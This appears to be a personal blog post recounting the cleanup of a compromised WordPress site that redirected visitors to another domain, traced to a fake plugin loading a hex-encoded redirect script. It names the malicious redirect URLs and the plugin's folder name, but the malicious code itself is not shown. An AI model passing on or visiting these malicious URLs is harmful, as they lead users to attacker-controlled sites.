As everyone knows, WordPress is a content management system (CMS) that is constantly being updated. If we don’t update it, we take the risk of someone entering and manipulating the site. Yesterday a customer called to tell me that his website, made in WordPress, redirected to another URL. In this case, his website was redirecting to http://gualdacatas.com
I spent a while googling but didn’t find anything about it, so I started to investigate a little more the behavior of the site. By checking FTP, I came across folders that had nothing to do with WordPress.
The site had clearly been infected and had a script that redirected to another site.
The next step was to delete all those directories, to see if I could avoid the redirection, but it didn’t work. That is why I went to the Firefox debugger.
I must clarify that this redirection was only done one time, so to see this anomaly again, I had to clear the cache or enter with private browsing.
By inspecting the behavior of the page, I came across this:
It seemed very strange… it was all in hexadecimal… I decided to convert everything to ASCII to know what it was.
As you can see above, it was a script that executed the URL: http://keit.staticweb.tk/z5z4vQ
Upon entering that URL I came across the following:
Which is exactly the web that was redirecting me… By having this, I already had more tools to investigate. And I stumbled upon the fact that “keit.staticweb.tk” is a fake WordPress plugin called _bb_press that redirects to other sites, such as pornographic sites, among others…
Now comes the fun part… Find and break that redirection.
Since it is a fake Plugin, I simply went directly to the plugins directory that is in wp-content/plugins. I found one called press_test515215 and for obvious reasons, I knew that was it.
Upon entering the folder of that plugin, there was a file called press_test515215.php which included another file inside of it.
Code: PHP include(dirname(__FILE__) . '/includes/_bb_press_plugin.class.php');
By opening this second file, I came across this:
And there you have it! That was the redirection that WordPress was doing. Solving it was easy. You just need to delete the plugin and the site will stop redirecting.